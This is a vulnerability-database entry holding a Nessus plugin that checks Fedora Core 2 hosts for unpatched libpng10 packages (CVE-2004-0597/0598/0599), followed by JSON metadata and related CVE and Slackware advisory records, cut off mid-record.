ID FEDORA_2004-238.NASL Type nessus Reporter This script is Copyright (C) 2004-2021 Tenable Network Security, Inc. Modified 2004-08-05T00:00:00
Description
The libpng package contains a library of functions for creating and
manipulating PNG (Portable Network Graphics) image format files.
During a source code audit, Chris Evans discovered several buffer
overflows in libpng. An attacker could create a carefully crafted PNG
file in such a way that it would cause an application linked with
libpng to execute arbitrary code when the file was opened by a victim.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2004-0597 to these issues.
In addition, this audit discovered a potential NULL pointer
dereference in libpng (CVE-2004-0598) and several integer overflow
issues (CVE-2004-0599). An attacker could create a carefully crafted
PNG file in such a way that it would cause an application linked with
libpng to crash when the file was opened by the victim.
Red Hat would like to thank Chris Evans for discovering these issues.
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2004-238.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
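if (description)
{
  script_id(14209);
  script_version("1.21");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/11");

  # The advisory text below covers three issues: the buffer overflows
  # (CVE-2004-0597), the NULL pointer dereference (CVE-2004-0598) and the
  # integer overflows (CVE-2004-0599). All three are tagged so that scan
  # results and CVE-based filtering agree with the advisory instead of
  # reporting only the first identifier.
  script_cve_id("CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599");
  script_xref(name:"FEDORA", value:"2004-238");

  script_name(english:"Fedora Core 2 : libpng10-1.0.15-8 (2004-238)");
  script_summary(english:"Checks rpm output for the updated packages.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Fedora Core host is missing a security update."
  );
  # Description text is taken verbatim from the Fedora advisory.
  script_set_attribute(
    attribute:"description",
    value:
"The libpng package contains a library of functions for creating and
manipulating PNG (Portable Network Graphics) image format files.
During a source code audit, Chris Evans discovered several buffer
overflows in libpng. An attacker could create a carefully crafted PNG
file in such a way that it would cause an application linked with
libpng to execute arbitrary code when the file was opened by a victim.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2004-0597 to these issues.
In addition, this audit discovered a potential NULL pointer
dereference in libpng (CVE-2004-0598) and several integer overflow
issues (CVE-2004-0599). An attacker could create a carefully crafted
PNG file in such a way that it would cause an application linked with
libpng to crash when the file was opened by the victim.
Red Hat would like to thank Chris Evans for discovering these issues.
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  # https://lists.fedoraproject.org/pipermail/announce/2004-August/000246.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?d01ab5cf"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"Update the affected libpng10, libpng10-debuginfo and / or
libpng10-devel packages."
  );

  # The base vector matches the arbitrary code execution impact the
  # advisory describes for the buffer overflows (CVE-2004-0597).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:libpng10");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:libpng10-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:libpng10-devel");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora_core:2");

  script_set_attribute(attribute:"patch_publication_date", value:"2004/08/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/08/05");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.");
  script_family(english:"Fedora Local Security Checks");

  # Local check: relies on the release string and rpm list gathered over SSH.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}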
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Host-side preconditions: local checks must be enabled, the target must
# report a Fedora release whose major number is 2, and the rpm list must be
# available. Each failed precondition is reported via audit().
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");

# Pull the major release number out of the release string.
release_match = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(release_match)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = release_match[1];

# Match "2" only; a longer number such as "20" is a different release.
if (! ereg(pattern:"^2([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 2.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Only the x86 / x86_64 builds are covered by this check.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (!("x86_64" >< cpu || cpu =~ "^i[3-6]86$")) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);

# Fixed package versions from the advisory. Each rpm_check() hit is counted;
# the details it records are presumably what rpm_report_get() returns below.
fixed_pkgs = make_list(
  "libpng10-1.0.15-8",
  "libpng10-debuginfo-1.0.15-8",
  "libpng10-devel-1.0.15-8"
);

flag = 0;
foreach pkg (fixed_pkgs)
{
  if (rpm_check(release:"FC2", reference:pkg)) flag++;
}

if (!flag)
{
  # Nothing vulnerable: distinguish "checked and up to date" from
  # "affected packages not installed at all".
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "libpng10 / libpng10-debuginfo / libpng10-devel");
}
else
{
  # At least one affected package is below its fixed version.
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
{"id": "FEDORA_2004-238.NASL", "bulletinFamily": "scanner", "title": "Fedora Core 2 : libpng10-1.0.15-8 (2004-238)", "description": "The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2004-08-05T00:00:00", "modified": "2004-08-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/14209", "reporter": "This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.", "references": ["http://www.nessus.org/u?d01ab5cf"], "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "type": "nessus", "lastseen": "2021-01-12T10:05:42", "edition": 24, "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0599", "CVE-2004-0598", "CVE-2004-0597"]}, {"type": "slackware", "idList": ["SSA-2004-222-01", "SSA-2004-223-01", "SSA-2004-223-02"]}, {"type": "osvdb", "idList": ["OSVDB:8314", "OSVDB:8326", "OSVDB:8313", "OSVDB:8316", "OSVDB:8315", "OSVDB:8312"]}, {"type": "openvas", "idList": ["OPENVAS:53918", "OPENVAS:52422", "OPENVAS:136141256231053920", "OPENVAS:53226", "OPENVAS:54633", "OPENVAS:54652", "OPENVAS:52430", "OPENVAS:53920", "OPENVAS:53262", "OPENVAS:136141256231053918"]}, {"type": "f5", "idList": ["SOL4009", "F5:K4009"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:15126", "SECURITYVULNS:DOC:15127", "SECURITYVULNS:DOC:6578", "SECURITYVULNS:DOC:8854", "SECURITYVULNS:DOC:6579", "SECURITYVULNS:DOC:7769", "SECURITYVULNS:DOC:7775", "SECURITYVULNS:DOC:6651"]}, {"type": "gentoo", "idList": ["GLSA-200408-22", "GLSA-200408-03"]}, {"type": "nessus", "idList": ["FEDORA_2004-236.NASL", "SLACKWARE_SSA_2004-222-01.NASL", "SUSE_SA_2004_023.NASL", "FREEBSD_PKG_F9E3E60BE65011D89B0A000347A4FA7D.NASL", "FREEBSD_LIBPNG_1257.NASL", "FEDORA_2004-237.NASL", "FEDORA_2004-239.NASL", "GENTOO_GLSA-200408-03.NASL", "SLACKWARE_SSA_2004-223-02.NASL", "MANDRAKE_MDKSA-2004-079.NASL"]}, {"type": "freebsd", "idList": ["F9E3E60B-E650-11D8-9B0A-000347A4FA7D"]}, {"type": "redhat", "idList": ["RHSA-2004:421", 
"RHSA-2004:402"]}, {"type": "cert", "idList": ["VU:236656", "VU:477512", "VU:388984", "VU:817368", "VU:189754", "VU:286464", "VU:160448"]}, {"type": "suse", "idList": ["SUSE-SA:2004:031", "SUSE-SA:2004:023", "SUSE-SA:2004:032", "SUSE-SA:2004:035", "SUSE-SA:2004:030", "SUSE-SA:2004:033", "SUSE-SA:2004:034"]}, {"type": "debian", "idList": ["DEBIAN:DSA-536-1:B4858"]}, {"type": "exploitdb", "idList": ["EDB-ID:393", "EDB-ID:389", "EDB-ID:25094"]}], "modified": "2021-01-12T10:05:42", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-01-12T10:05:42", "rev": 2}, "vulnersScore": 8.1}, "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-238.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14209);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0597\");\n script_xref(name:\"FEDORA\", value:\"2004-238\");\n\n script_name(english:\"Fedora Core 2 : libpng10-1.0.15-8 (2004-238)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. 
\n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000246.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d01ab5cf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libpng10, libpng10-debuginfo and / or\nlibpng10-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 2.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC2\", reference:\"libpng10-1.0.15-8\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"libpng10-debuginfo-1.0.15-8\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"libpng10-devel-1.0.15-8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng10 / libpng10-debuginfo / libpng10-devel\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "14209", "cpe": ["cpe:/o:fedoraproject:fedora_core:2", "p-cpe:/a:fedoraproject:fedora:libpng10-devel", "p-cpe:/a:fedoraproject:fedora:libpng10-debuginfo", 
"p-cpe:/a:fedoraproject:fedora:libpng10"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:21:32", "description": "Multiple buffer overflows in libpng 1.2.5 and earlier, as used in multiple products, allow remote attackers to execute arbitrary code via malformed PNG images in which (1) the png_handle_tRNS function does not properly validate the length of transparency chunk (tRNS) data, or the (2) png_handle_sBIT or (3) png_handle_hIST functions do not perform sufficient bounds checking.", "edition": 5, "cvss3": {}, "published": "2004-11-23T05:00:00", "title": "CVE-2004-0597", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0597"], "modified": "2018-10-12T21:34:00", "cpe": ["cpe:/o:microsoft:windows_me:*", "cpe:/a:microsoft:windows_media_player:9", "cpe:/o:microsoft:windows_98se:*", "cpe:/a:microsoft:msn_messenger:6.2", "cpe:/a:greg_roelofs:libpng:1.2.5", "cpe:/a:microsoft:windows_messenger:5.0", "cpe:/a:microsoft:msn_messenger:6.1"], "id": "CVE-2004-0597", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0597", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_me:*:*:second_edition:*:*:*:*:*", "cpe:2.3:a:microsoft:msn_messenger:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:greg_roelofs:libpng:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:windows_media_player:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:msn_messenger:6.1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_98se:*:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:windows_messenger:5.0:*:*:*:*:*:*:*"]}, {"lastseen": 
"2020-12-09T19:21:32", "description": "The png_handle_iCCP function in libpng 1.2.5 and earlier allows remote attackers to cause a denial of service (application crash) via a certain PNG image that triggers a null dereference.", "edition": 5, "cvss3": {}, "published": "2004-11-23T05:00:00", "title": "CVE-2004-0598", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0598"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:greg_roelofs:libpng:1.2.5"], "id": "CVE-2004-0598", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0598", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:greg_roelofs:libpng:1.2.5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:21:32", "description": "Multiple integer overflows in the (1) png_read_png in pngread.c or (2) png_handle_sPLT functions in pngrutil.c or (3) progressive display image reading capability in libpng 1.2.5 and earlier allow remote attackers to cause a denial of service (application crash) via a malformed PNG image.", "edition": 5, "cvss3": {}, "published": "2004-11-23T05:00:00", "title": "CVE-2004-0599", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, 
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0599"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:greg_roelofs:libpng:1.2.5"], "id": "CVE-2004-0599", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0599", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:greg_roelofs:libpng:1.2.5:*:*:*:*:*:*:*"]}], "slackware": [{"lastseen": "2020-10-25T16:36:02", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599"], "description": "New imagemagick packages are available for Slackware 9.1, 10.0,\nand -current to fix security issues with PNG images.\n\nMore details about the issues with PNG may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\n\nHere are the details from the Slackware 10.0 ChangeLog:\n\nSat Aug 7 17:17:20 AKDT 2004\npatches/packages/imagemagick-6.0.4_3-i486-1.tgz: Upgraded to\n ImageMagick-6.0.4-3. 
Fixes PNG security issues.\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/imagemagick-5.5.7_25-i486-1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/imagemagick-6.0.4_3-i486-1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/imagemagick-6.0.4_3-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 9.1 package:\n52903d349dcbaf3be88d19c8aa05dbbf imagemagick-5.5.7_25-i486-1.tgz\n\nSlackware 10.0 package:\nad5531a33331029dcc7013b72f8ec792 imagemagick-6.0.4_3-i486-1.tgz\n\nSlackware -current package:\nad5531a33331029dcc7013b72f8ec792 imagemagick-6.0.4_3-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg imagemagick-6.0.4_3-i486-1.tgz", "modified": "2004-08-10T21:26:39", "published": "2004-08-10T21:26:39", "id": "SSA-2004-223-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.353817", "type": "slackware", "title": "[slackware-security] imagemagick", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T07:36:39", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix security issues. 
These issues could cause program crashes,\nor possibly allow arbitrary code embedded in a malicious PNG image to execute.\nThe PNG library is widely used within the system, so all sites should upgrade\nto the new libpng package.\n\nMore details about these issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\n\nHere are the details from the Slackware 10.0 ChangeLog:\n\nSat Aug 7 17:17:20 PDT 2004\npatches/packages/libpng-1.2.5-i486-3.tgz: Patched possible security\n issues including buffer and integer overflows and null pointer\n references. These issues could cause program crashes, or possibly\n allow arbitrary code embedded in a malicious PNG image to execute.\n The PNG library is widely used within the system, so all sites\n should upgrade to the new libpng package.\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/libpng-1.2.5-i386-1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/libpng-1.2.5-i386-2.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/libpng-1.2.5-i486-3.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/libpng-1.2.5-i486-3.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpng-1.2.5-i486-3.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 
package:\nbe08f3ea7e8b41a3fd7ce49a676617e0 libpng-1.2.5-i386-1.tgz\n\nSlackware 9.0 package:\n6c68e6a65850e26b60651d65fd8c0a2f libpng-1.2.5-i386-2.tgz\n\nSlackware 9.1 package:\n4fcf53708102839f3cac78a99d05e750 libpng-1.2.5-i486-3.tgz\n\nSlackware 10.0 package:\n094a9825c51204a9aa2cb0bbb43b7a64 libpng-1.2.5-i486-3.tgz\n\nSlackware -current package:\n094a9825c51204a9aa2cb0bbb43b7a64 libpng-1.2.5-i486-3.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg libpng-1.2.5-i486-3.tgz", "modified": "2004-08-09T20:40:50", "published": "2004-08-09T20:40:50", "id": "SSA-2004-222-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.439243", "type": "slackware", "title": "libpng", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-25T16:36:03", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599", "CVE-2004-0718", "CVE-2004-0722", "CVE-2004-0757", "CVE-2004-0758", "CVE-2004-0759", "CVE-2004-0760", "CVE-2004-0761", "CVE-2004-0762", "CVE-2004-0763", "CVE-2004-0764", "CVE-2004-0765"], "description": "New Mozilla packages are available for Slackware 9.1, 10.0, and -current\nto fix a number of security issues. Slackware 10.0 and -current were\nupgraded to Mozilla 1.7.2, and Slackware 9.1 was upgraded to Mozilla 1.4.3.\nAs usual, new versions of Mozilla require new versions of things that link\nwith the Mozilla libraries, so for Slackware 10.0 and -current new versions\nof epiphany, galeon, gaim, and mozilla-plugins have also been provided.\nThere don't appear to be epiphany and galeon versions that are compatible\nwith Mozilla 1.4.3 and the GNOME in Slackware 9.1, so these are not\nprovided and Epiphany and Galeon will be broken on Slackware 9.1 if the\nnew Mozilla package is installed. 
Furthermore, earlier versions of\nMozilla (such as the 1.3 series) were not fixed upstream, so versions\nof Slackware earlier than 9.1 will remain vulnerable to these browser\nissues. If you still use Slackware 9.0 or earlier, you may want to\nconsider removing Mozilla or upgrading to a newer version.\n\nMore details about these issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n Issues fixed in Mozilla 1.7.2:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0763\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0758\n\n Issues fixed in Mozilla 1.4.3:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0718\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0722\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0757\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0758\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0759\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0760\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0761\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0762\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0763\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0764\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0765\n\n\nHere are the details from the Slackware 10.0 ChangeLog:\n\nMon Aug 9 01:56:43 PDT 2004\npatches/packages/epiphany-1.2.7-i486-1.tgz: Upgraded to epiphany-1.2.7.\n (compiled against Mozilla 1.7.2)\npatches/packages/gaim-0.81-i486-1.tgz: Upgraded to gaim-0.81.\n (compiled against Mozilla 1.7.2)\npatches/packages/galeon-1.3.17-i486-1.tgz: Upgraded to galeon-1.3.17.\n (compiled against Mozilla 1.7.2)\npatches/packages/mozilla-1.7.2-i486-1.tgz: Upgraded to 
